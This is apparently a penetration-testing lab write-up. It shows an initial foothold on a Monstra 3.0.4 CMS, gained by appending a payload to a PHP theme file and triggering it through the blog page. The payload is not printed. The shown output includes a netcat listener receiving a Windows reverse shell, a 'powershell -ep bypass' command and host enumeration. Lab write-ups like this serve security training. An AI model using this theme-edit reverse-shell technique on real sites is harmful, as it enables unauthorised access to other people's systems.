InfoSec LAB

Monstra Theme Edit

The target Monstra instance has so many vulnerabilities due to its outdated version; 3.0.4 However, exploiting those vulnerabilities seem rather challenging as most exploits leverage the file upload feature, which doesn’t appear to be functioning as it should. Thus, I will be opting out to another vector to gain the initial foothold.

Most CMS supports “themes”, and they can be edited if administrative access is granted.

Monstra is no exception.

I will go with this one

Appending the payload at the bottom Save and Exit

Invoking the payload by navigating to the blog; /blog/blog

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.156.180] 49801
SOCKET: Shell has connected! PID: 4832
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\blog> powershell -ep bypass -nop 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\xampp\htdocs\blog> whoami
mike-pc\mike
PS C:\xampp\htdocs\blog> hostname
Mike-PC
PS C:\xampp\htdocs\blog> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.156.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.156.254

Initial Foothold established to the target system as the mike user via editing a PHP theme file of the target Monstra instance

InfoSec LAB

Explorer

Monster_Exploitation

Monstra Theme Edit

Interactive Graph View

Backlinks